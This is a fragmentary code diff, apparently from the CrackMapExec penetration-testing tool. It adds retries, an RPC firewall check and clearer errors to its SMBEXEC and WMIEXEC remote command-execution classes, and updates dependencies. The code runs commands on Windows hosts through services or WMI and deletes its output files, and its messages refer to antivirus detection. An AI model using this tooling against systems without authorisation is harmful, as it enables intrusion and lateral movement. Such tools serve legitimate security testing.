resp = scmr.hRCreateServiceW(
|
||||||
self.__scmr,
|
self.__scmr,
|
||||||
self.__scHandle,
|
self.__scHandle,
|
||||||
|
@ -135,6 +138,12 @@ class SMBEXEC:
|
||||||
dwStartType=scmr.SERVICE_DEMAND_START,
|
dwStartType=scmr.SERVICE_DEMAND_START,
|
||||||
)
|
)
|
||||||
service = resp["lpServiceHandle"]
|
service = resp["lpServiceHandle"]
|
||||||
|
except Exception as e:
|
||||||
|
if "rpc_s_access_denied" in str(e):
|
||||||
|
self.logger.fail("SMBEXEC: Create services got blocked.")
|
||||||
|
return self.__outputBuffer
|
||||||
|
else:
|
||||||
|
pass
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self.logger.debug(f"Remote service {self.__serviceName} started.")
|
self.logger.debug(f"Remote service {self.__serviceName} started.")
|
||||||
|
@ -150,20 +159,28 @@ class SMBEXEC:
|
||||||
if self.__retOutput is False:
|
if self.__retOutput is False:
|
||||||
self.__outputBuffer = ""
|
self.__outputBuffer = ""
|
||||||
return
|
return
|
||||||
|
tries = 1
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
|
self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
||||||
break
|
break
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print(e)
|
if tries >= self.__tries:
|
||||||
if str(e).find("STATUS_SHARING_VIOLATION") >= 0:
|
self.logger.fail(f'SMBEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option "--get-output-tries". If it\'s still failing maybe something is blocking the schedule job, try another exec method')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
|
||||||
|
self.logger.fail(f'SMBEXEC: Get ouput failed, target has blocked {self.__share} access (maybe command executed!)')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
# Output not finished, let's wait
|
# Output not finished, let's wait
|
||||||
sleep(2)
|
sleep(2)
|
||||||
pass
|
tries += 1
|
||||||
else:
|
else:
|
||||||
self.logger.debug(e)
|
self.logger.debug(str(e))
|
||||||
pass
|
|
||||||
|
|
||||||
|
if self.__outputBuffer:
|
||||||
|
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.deleteFile(self.__share, self.__output)
|
self.__smbconnection.deleteFile(self.__share, self.__output)
|
||||||
|
|
||||||
def execute_fileless(self, data):
|
def execute_fileless(self, data):
|
||||||
|
|
|
@ -5,7 +5,7 @@ import ntpath
|
||||||
import os
|
import os
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from cme.helpers.misc import gen_random_string
|
from cme.helpers.misc import gen_random_string
|
||||||
from cme.logger import cme_logger
|
from impacket.dcerpc.v5 import transport
|
||||||
from impacket.dcerpc.v5.dcomrt import DCOMConnection
|
from impacket.dcerpc.v5.dcomrt import DCOMConnection
|
||||||
from impacket.dcerpc.v5.dcom import wmi
|
from impacket.dcerpc.v5.dcom import wmi
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
@ -25,7 +25,9 @@ class WMIEXEC:
|
||||||
kdcHost=None,
|
kdcHost=None,
|
||||||
hashes=None,
|
hashes=None,
|
||||||
share=None,
|
share=None,
|
||||||
logger=cme_logger
|
logger=None,
|
||||||
|
timeout=None,
|
||||||
|
tries=None
|
||||||
):
|
):
|
||||||
self.__target = target
|
self.__target = target
|
||||||
self.__username = username
|
self.__username = username
|
||||||
|
@ -34,6 +36,7 @@ class WMIEXEC:
|
||||||
self.__lmhash = ""
|
self.__lmhash = ""
|
||||||
self.__nthash = ""
|
self.__nthash = ""
|
||||||
self.__share = share
|
self.__share = share
|
||||||
|
self.__timeout = timeout
|
||||||
self.__smbconnection = smbconnection
|
self.__smbconnection = smbconnection
|
||||||
self.__output = None
|
self.__output = None
|
||||||
self.__outputBuffer = b""
|
self.__outputBuffer = b""
|
||||||
|
@ -44,6 +47,8 @@ class WMIEXEC:
|
||||||
self.__kdcHost = kdcHost
|
self.__kdcHost = kdcHost
|
||||||
self.__doKerberos = doKerberos
|
self.__doKerberos = doKerberos
|
||||||
self.__retOutput = True
|
self.__retOutput = True
|
||||||
|
self.__stringBinding = ""
|
||||||
|
self.__tries = tries
|
||||||
self.logger = logger
|
self.logger = logger
|
||||||
|
|
||||||
if hashes is not None:
|
if hashes is not None:
|
||||||
|
@ -68,12 +73,39 @@ class WMIEXEC:
|
||||||
kdcHost=self.__kdcHost,
|
kdcHost=self.__kdcHost,
|
||||||
)
|
)
|
||||||
iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
|
iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
|
||||||
|
try:
|
||||||
|
self.firewall_check(iInterface, self.__timeout)
|
||||||
|
except:
|
||||||
|
self.logger.fail(f'WMIEXEC: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the option "--wmiexec-timeout". If it\'s still failing maybe something is blocking the RPC connection, try another exec method')
|
||||||
|
self.__dcom.disconnect()
|
||||||
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
|
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
|
||||||
iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
||||||
iWbemLevel1Login.RemRelease()
|
iWbemLevel1Login.RemRelease()
|
||||||
|
|
||||||
self.__win32Process, _ = iWbemServices.GetObject("Win32_Process")
|
self.__win32Process, _ = iWbemServices.GetObject("Win32_Process")
|
||||||
|
|
||||||
|
def firewall_check(self, iInterface ,timeout):
|
||||||
|
stringBindings = iInterface.get_cinstance().get_string_bindings()
|
||||||
|
for strBinding in stringBindings:
|
||||||
|
if strBinding['wTowerId'] == 7:
|
||||||
|
if strBinding['aNetworkAddr'].find('[') >= 0:
|
||||||
|
binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')
|
||||||
|
bindingPort = '[' + bindingPort
|
||||||
|
else:
|
||||||
|
binding = strBinding['aNetworkAddr']
|
||||||
|
bindingPort = ''
|
||||||
|
|
||||||
|
if binding.upper().find(iInterface.get_target().upper()) >= 0:
|
||||||
|
stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]
|
||||||
|
break
|
||||||
|
elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition('.')[0]) >= 0:
|
||||||
|
stringBinding = 'ncacn_ip_tcp:%s%s' % (iInterface.get_target(), bindingPort)
|
||||||
|
|
||||||
|
self.__stringBinding = stringBinding
|
||||||
|
rpctransport = transport.DCERPCTransportFactory(stringBinding)
|
||||||
|
rpctransport.set_connect_timeout(timeout)
|
||||||
|
rpctransport.connect()
|
||||||
|
rpctransport.disconnect()
|
||||||
|
|
||||||
def execute(self, command, output=False):
|
def execute(self, command, output=False):
|
||||||
self.__retOutput = output
|
self.__retOutput = output
|
||||||
if self.__retOutput:
|
if self.__retOutput:
|
||||||
|
@ -101,15 +133,12 @@ class WMIEXEC:
|
||||||
self.__outputBuffer += data
|
self.__outputBuffer += data
|
||||||
|
|
||||||
def execute_handler(self, data):
|
def execute_handler(self, data):
|
||||||
if self.__retOutput:
|
|
||||||
try:
|
try:
|
||||||
self.logger.debug("Executing remote")
|
self.logger.debug("Executing remote")
|
||||||
self.execute_remote(data)
|
self.execute_remote(data)
|
||||||
except:
|
except:
|
||||||
self.cd("\\")
|
self.cd("\\")
|
||||||
self.execute_remote(data)
|
self.execute_remote(data)
|
||||||
else:
|
|
||||||
self.execute_remote(data)
|
|
||||||
|
|
||||||
def execute_remote(self, data):
|
def execute_remote(self, data):
|
||||||
self.__output = "\\Windows\\Temp\\" + gen_random_string(6)
|
self.__output = "\\Windows\\Temp\\" + gen_random_string(6)
|
||||||
|
@ -146,17 +175,26 @@ class WMIEXEC:
|
||||||
self.__outputBuffer = ""
|
self.__outputBuffer = ""
|
||||||
return
|
return
|
||||||
|
|
||||||
|
tries = 1
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
|
self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
||||||
break
|
break
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if str(e).find("STATUS_SHARING_VIOLATION") >= 0:
|
if tries >= self.__tries:
|
||||||
# Output not finished, let's wait
|
self.logger.fail(f'WMIEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option "--get-output-tries". If it\'s still failing maybe something is blocking the schedule job, try another exec method')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
|
||||||
|
self.logger.fail(f'SMB connection: target has blocked {self.__share} access (maybe command executed!)')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
sleep(2)
|
sleep(2)
|
||||||
|
tries += 1
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
# print str(e)
|
self.logger.debug(str(e))
|
||||||
pass
|
|
||||||
|
|
||||||
|
if self.__outputBuffer:
|
||||||
|
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.deleteFile(self.__share, self.__output)
|
self.__smbconnection.deleteFile(self.__share, self.__output)
|
File diff suppressed because it is too large
Load Diff
|
@ -44,7 +44,7 @@ pywerview = "^0.3.3"
|
||||||
minikerberos = "^0.4.0"
|
minikerberos = "^0.4.0"
|
||||||
pypykatz = "^0.6.8"
|
pypykatz = "^0.6.8"
|
||||||
aardwolf = "^0.2.7"
|
aardwolf = "^0.2.7"
|
||||||
dploot = "^2.1.21"
|
dploot = "^2.2.1"
|
||||||
bloodhound = "^1.6.1"
|
bloodhound = "^1.6.1"
|
||||||
asyauth = "~0.0.13"
|
asyauth = "~0.0.13"
|
||||||
masky = "^0.2.0"
|
masky = "^0.2.0"
|
||||||
|
|
|
@ -1,89 +0,0 @@
|
||||||
aardwolf==0.2.7 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
aesedb==0.1.4 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
aioconsole==0.3.3 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
aiosmb==0.4.6 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
aiosqlite==0.18.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
aiowinreg==0.0.10 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
arc4==0.4.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
asn1crypto==1.5.1 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
asn1tools==0.166.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
asyauth==0.0.14 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
asysocks==0.2.7 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
bcrypt==4.0.1 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
beautifulsoup4==4.12.2 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
bitstruct==8.17.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
bloodhound==1.6.1 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
bs4==0.0.1 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
certifi==2023.5.7 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
cffi==1.15.1 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
charset-normalizer==3.1.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
click==8.1.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
colorama==0.4.6 ; python_full_version < "4.0.0" and python_version >= "3.7" or python_version >= "3.7" and python_version < "4.0" and platform_system == "Windows"
|
|
||||||
cryptography==40.0.2 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
dnspython==2.3.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
dploot==2.1.22 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
dsinternals==1.2.4 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
exceptiongroup==1.1.1 ; python_version >= "3.7" and python_version < "3.11"
|
|
||||||
flask==2.2.5 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
future==0.18.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
greenlet==2.0.2 ; python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "aarch64" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "ppc64le" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "x86_64" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "amd64" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "AMD64" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "win32" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "WIN32"
|
|
||||||
idna==3.4 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
impacket @ git+https://github.com/mpgn/impacket.git@gkdi ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
importlib-metadata==4.2.0 ; python_version >= "3.7" and python_version < "3.10"
|
|
||||||
iniconfig==2.0.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
itsdangerous==2.1.2 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
jinja2==3.1.2 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
ldap3==2.9.1 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
ldapdomaindump==0.9.4 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
lsassy==3.1.8 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
lxml==4.9.2 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
markdown-it-py==2.2.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
markupsafe==2.1.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
masky==0.2.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
mdurl==0.1.2 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
minidump==0.0.21 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
minikerberos==0.4.1 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
msgpack==1.0.5 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
msldap==0.5.5 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
neo4j==4.4.11 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
netaddr==0.8.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
oscrypto==1.3.0 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
packaging==23.1 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
paramiko==2.12.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pillow==9.5.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
pluggy==1.2.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
prompt-toolkit==3.0.38 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
pyasn1-modules==0.3.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pyasn1==0.4.8 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pycparser==2.21 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pycryptodomex==3.18.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pygments==2.15.1 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
pylnk3==0.4.2 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pynacl==1.5.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pyopenssl==23.2.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pyparsing==3.1.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
pyperclip==1.8.2 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
pypsrp==0.7.0 ; python_full_version >= "3.7.0" and python_version < "4.0"
|
|
||||||
pypykatz==0.6.8 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pyspnego==0.9.1 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pytest==7.4.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
python-libnmap==0.7.3 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pytz==2023.3 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pywerview==0.3.3 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
requests==2.31.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
rich==13.4.2 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
six==1.16.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
soupsieve==2.4.1 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
sqlalchemy==2.0.17 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
termcolor==1.1.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
terminaltables==3.1.10 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
tomli==2.0.1 ; python_version >= "3.7" and python_version < "3.11"
|
|
||||||
tqdm==4.65.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
typing-extensions==4.6.3 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
unicrypto==0.0.10 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
urllib3==2.0.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
wcwidth==0.2.6 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
werkzeug==2.2.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
winacl==0.1.7 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
xmltodict==0.12.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
zipp==3.15.0 ; python_version >= "3.7" and python_version < "3.10"
|
|
Loading…
Reference in New Issue